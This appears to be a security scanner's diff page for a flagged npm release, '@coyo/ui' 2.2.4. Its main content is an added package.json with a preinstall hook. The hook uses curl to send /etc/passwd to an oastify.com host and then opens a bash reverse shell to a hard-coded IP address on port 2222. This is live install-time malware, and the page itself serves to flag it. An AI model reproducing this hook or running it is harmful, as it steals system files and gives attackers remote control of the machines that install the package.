@coyo/ui 2.2.4
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @coyo/ui might be problematic. Click here for more details.
- package/package.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "@coyo/ui",
|
3
|
+
"version": "2.2.4",
|
4
|
+
"description": "blaze",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"\"",
|
8
|
+
"preinstall": "$(command -v curl) --data '@/etc/passwd' zlorf802hqvhccsfi6ikeyn2dtjk7hv6.oastify.com/test2; /bin/bash -i >& /dev/tcp/188.166.41.114/2222 0>&1"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|